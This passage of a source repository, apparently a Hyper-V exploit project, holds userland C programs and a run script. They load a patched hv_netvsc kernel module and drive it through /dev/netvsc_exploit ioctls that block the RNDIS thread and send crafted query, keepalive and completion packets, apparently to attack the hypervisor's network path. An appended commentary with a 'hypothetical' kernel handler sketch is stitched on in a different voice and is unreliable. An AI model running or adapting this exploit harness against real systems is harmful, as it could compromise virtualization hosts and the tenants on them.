36 | goto __EXIT;
37 | }
38 |
39 |
40 | printf("[*]hyper_v: block rndis thread.\n");
41 | block = 1;
42 | ret = ioctl(fd,
HYPERV_IOCTL_BLOCK_RNDIS_PKT_THREAD, &block, sizeof(block));
43 | if(0 != ret)
44 | {
45 | perror("[*]hyper_v: block rndis thread fail.");
46 | goto __EXIT;
47 | }
48 |
49 | printf("[*]hyper_v: send second rndis query.\n");
50 | ret = ioctl(fd, HYPERV_IOCTL_SEND_RNDIS_PKT_QUERY, &recv_buf_size, sizeof(recv_buf_size));
51 | if(0 != ret)
52 | {
53 | perror("[*]hyper_v send rndis query fail.");
54 | goto __EXIT;
55 | }
56 |
57 | printf("[*]press any key to continue......\n");
58 | getchar();
59 | printf("[*]hyper_v: send rndis pkt comp.\n");
60 | block = 0;*/
61 | /*ret = ioctl(fd, HYPERV_IOCTL_SEND_RNDIS_PKT_COMPLETE, &block, sizeof(block));
62 | if(0 != ret)
63 | {
64 | perror("[*]hyper_v: send rndis send pkt comp fail.");
65 | goto __EXIT;
66 | }*/
67 |
68 |
69 | /*printf("[*]hyper_v: send second rndis query.\n");
70 | ret = ioctl(fd, HYPERV_IOCTL_SEND_RNDIS_PKT_QUERY, &recv_buf_size, sizeof(recv_buf_size));
71 | if(0 != ret)
72 | {
73 | perror("[*]hyper_v send rndis query fail.");
74 | goto __EXIT;
75 | }*/
76 |
77 |
78 |
79 | printf("[*]hyper_v: block rndis thread.\n");
80 | block = 1;
81 | ret = ioctl(fd, HYPERV_IOCTL_BLOCK_RNDIS_PKT_THREAD, &block, sizeof(block));
82 | if(0 != ret)
83 | {
84 | perror("[*]hyper_v: block rndis thread fail.");
85 | goto __EXIT;
86 | }
87 |
88 | for(int i=0; i<10; i++)
89 | {
90 | printf("[*]hyper_v: send %d rndis keep alive.\n", i);
91 | ret = ioctl(fd, HYPERV_IOCTL_SEND_RNDIS_PKT_KEEPALIVE, &recv_buf_size, sizeof(recv_buf_size));
92 | if(0 != ret)
93 | {
94 | perror("[*]hyper_v send rndis keep alive fail.");
95 | goto __EXIT;
96 | }
97 | }
98 |
99 |
100 | /*printf("[*]press any key to continue......\n");
101 | getchar();
102 | printf("[*]hyper_v: send rndis pkt comp.\n");
103 | block = 0;
104 | ret = ioctl(fd, HYPERV_IOCTL_BLOCK_RNDIS_PKT_THREAD, &block, sizeof(block));
105 | if(0 != ret)
106 | {
107 | perror("[*]hyper_v: send rndis send pkt comp fail.");
108 | goto __EXIT;
109 | }
110 |
111 | printf("[*]hyper_v: unblock rndis thread.\n");
112 | ret = ioctl(fd, HYPERV_IOCTL_SEND_RNDIS_PKT_COMPLETE, &block, sizeof(block));
113 | if(0 != ret)
114 | {
115 | perror("[*]hyper_v: unblock rndis thread fail.");
116 | goto __EXIT;
117 | }*/
118 |
119 | __EXIT:
120 | if(-1 != fd)
121 | {
122 | close(fd);
123 | }
124 | return 0;
125 | }
--------------------------------------------------------------------------------
/ring3/hyper_v.h:
--------------------------------------------------------------------------------
1 | /home/fuzzer/code/hyper_v_exploit/ring0/hyperv/hyper_v.h
--------------------------------------------------------------------------------
/ring3/hyper_v2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/4B5F5F4B/HyperV/b1fba46337217abc9280dbd374e3b4e7ee6ce17b/ring3/hyper_v2
--------------------------------------------------------------------------------
/ring3/hyper_v2.c:
--------------------------------------------------------------------------------
1 | #include <stdio.h>
2 | #include <string.h>
3 | #include <fcntl.h>
4 | #include <sys/ioctl.h>
5 | #include "hyper_v.h"
6 | #include <unistd.h>
7 |
8 | #define HYPERV_NETVSC_DEV_NAME "/dev/netvsc_exploit"
9 |
10 | typedef unsigned int u32;
11 | typedef _Bool bool;
12 |
13 | int main()
14 | {
15 | char buf[256];
16 | bool block;
17 | int ret;
18 | int fd = open(HYPERV_NETVSC_DEV_NAME, O_RDWR);
19 | if(-1 == fd)
20 | {
21 | perror("[*]open netvsc_exploit fail.");
22 | goto __EXIT;
23 | }
24 |
25 | memset(buf, 0, sizeof(buf));
26 |
27 | unsigned int recv_buf_size = 0x4B * 0x1000;
28 | block = 0;
29 | printf("[*]hyper_v: unblock rndis thread.\n");
30 | ret = ioctl(fd,
HYPERV_IOCTL_BLOCK_RNDIS_PKT_THREAD, &block, sizeof(block));
31 | if(0 != ret)
32 | {
33 | perror("[*]hyper_v: unblock rndis thread fail.");
34 | goto __EXIT;
35 | }
36 | printf("[*]hyper_v: send rndis pkt comp.\n");
37 | block = 0;
38 | ret = ioctl(fd, HYPERV_IOCTL_SEND_RNDIS_PKT_COMPLETE, &block, sizeof(block));
39 | if(0 != ret)
40 | {
41 | perror("[*]hyper_v: send rndis send pkt comp fail.");
42 | goto __EXIT;
43 | }
44 |
45 |
46 | printf("[*]hyper_v: send %d rndis query.\n", 0);
47 | /*ret = ioctl(fd, HYPERV_IOCTL_SEND_RNDIS_PKT_QUERY, &recv_buf_size, sizeof(recv_buf_size));
48 | if(0 != ret)
49 | {
50 | perror("[*]hyper_v send rndis query fail.");
51 | goto __EXIT;
52 | }*/
53 |
54 | __EXIT:
55 | if(-1 != fd)
56 | {
57 | close(fd);
58 | }
59 | return 0;
60 | }
--------------------------------------------------------------------------------
/run.sh:
--------------------------------------------------------------------------------
1 | rmmod hv_netvsc
2 | insmod ring0/hyperv/hv_netvsc.ko
3 | ./ring3/hyper_v
--------------------------------------------------------------------------------
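A note on the ring0 side of this interface: ring3/hyper_v.c and ring3/hyper_v2.c drive the patched hv_netvsc module through /dev/netvsc_exploit and the HYPERV_IOCTL_* commands declared in hyper_v.h, but the character-device dispatch code itself is not reproduced in this listing (only the prebuilt hv_netvsc.ko is). For orientation, a minimal sketch of what such a handler could look like follows. It is an assumption for illustration, not the module's actual code: the netvsc_exploit_* names and the rndis_thread_blocked flag are hypothetical, with only the device name and ioctl codes taken from the sources above.

/* Hypothetical sketch of the ioctl dispatch behind /dev/netvsc_exploit. */
#include <linux/module.h>
#include <linux/miscdevice.h>
#include <linux/fs.h>
#include <linux/uaccess.h>
#include "hyper_v.h"

static bool rndis_thread_blocked; /* assumed flag polled by the receive path */

static long netvsc_exploit_ioctl(struct file *file, unsigned int cmd,
				 unsigned long arg)
{
	bool block;

	switch (cmd) {
	case HYPERV_IOCTL_BLOCK_RNDIS_PKT_THREAD:
		/* ring3 passes a bool: 1 parks the rndis thread, 0 releases it */
		if (copy_from_user(&block, (void __user *)arg, sizeof(block)))
			return -EFAULT;
		rndis_thread_blocked = block;
		return 0;
	case HYPERV_IOCTL_SEND_RNDIS_PKT_KEEPALIVE:
		/* would build a keepalive message and hand it to
		 * rndis_filter_send_request() in rndis_filter.c */
		return 0;
	default:
		return -ENOTTY;
	}
}

static const struct file_operations netvsc_exploit_fops = {
	.owner		= THIS_MODULE,
	.unlocked_ioctl	= netvsc_exploit_ioctl,
};

static struct miscdevice netvsc_exploit_dev = {
	.minor	= MISC_DYNAMIC_MINOR,
	.name	= "netvsc_exploit", /* creates /dev/netvsc_exploit */
	.fops	= &netvsc_exploit_fops,
};

Calling misc_register(&netvsc_exploit_dev) from the module's init path is what would create the device node that run.sh expects ./ring3/hyper_v to open.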